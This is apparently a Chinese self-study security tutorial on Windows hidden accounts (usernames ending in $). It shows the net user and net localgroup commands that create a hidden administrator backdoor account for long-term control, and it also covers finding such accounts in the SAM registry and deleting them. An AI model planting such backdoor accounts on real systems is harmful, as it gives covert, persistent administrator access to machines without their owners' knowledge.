《网络安全自学教程》- Windows隐藏账户的安全问题与实战操作。

时间:2024-10-04 18:03:28
《网络安全自学教程》

在这里插入图片描述

Windows系统的普通用户比管理员用户少很多「权限」,比如无法更改系统设置、安装软件、访问所有文件、更改其他用户账户等。

因此,黑客在拿到机器权限后,通常会创建一个「隐藏」的具有「管理员权限」的后门账户,实现长期控制。

在这里插入图片描述

Windows隐藏账户

  • 1、什么是隐藏账户?
  • 2、查看隐藏账户
  • 3、实战演示
    • 3.1、普通用户的权限问题
    • 3.2、创建隐藏账户
    • 3.3、添加到administrators组
    • 3.4、验证权限
  • 4、清理隐藏账户

1、什么是隐藏账户?

「隐藏账户」的用户名以$结尾,比如 tom$

命令行无法看到隐藏账户,但可以正常登录,具有隐蔽性。

在这里插入图片描述

2、查看隐藏账户

1)win + r 输入 打开本地用户和组,可以看到隐藏账户。

在这里插入图片描述

2)win + r 输入 regedit 打开注册表,找到 KLM\SAM\SAM\Domains\Account\Users\Names\

默认没有权限查看SAM注册表

在这里插入图片描述

右键权限,给administrators添加权限。

在这里插入图片描述

重新打开注册表,可以看到隐藏账户。

在这里插入图片描述

3、实战演示

net user tom /add 创建一个普通账户。

在这里插入图片描述

注销,使用用户tom登录。

在这里插入图片描述

3.1、普通用户的权限问题

whoami  			# 查看当前登录用户
net user tom		# 查看用户tom的信息
net user test /add	# 创建一个用户
  • 1
  • 2
  • 3

现在用户在Users组,创建用户提示拒绝访问,也就是没有权限。

在这里插入图片描述

右键管理员身份启动cmd,还要输入administrator的密码,后面如果冤大头把密码改了,我们就无法控制。

在这里插入图片描述

net user 能看到创建的用户,有点基础就能发现,隐秘性不好。

在这里插入图片描述

注销,登录administrator。

3.2、创建隐藏账户

net user tom01$ 123.qwertyuiop /add # 创建隐藏账户
net user							# 查看所有账户
  • 1
  • 2

命令行看不到,具有隐蔽性。

在这里插入图片描述

3.3、添加到administrators组

net localgroup administrators tom01$ /add # 添加用户到administrators组
net user tom01$							  # 查看用户信息
  • 1
  • 2

在这里插入图片描述

注销,登录tom01$账户。

3.4、验证权限

右键以管理员身份打开cmd,不再需要输入administrator的密码。

whoami				# 当前登录账户
net user tom /del	# 删除(开头创建的)账户
net user			# 查看所有账户
  • 1
  • 2
  • 3

可以更改其他账户,确认拥有管理员权限。

在这里插入图片描述

到这里,我们成功创建了管理员权限账户,并且实现了隐蔽性。

注销,登录administrator。

4、清理隐藏账户

net user tom01$ /del 删除隐藏账户

在这里插入图片描述

本地用户和组、SAM注册表里已经不见了。

在这里插入图片描述

注销,再登录,已经无法登录,确认隐藏账户已清除。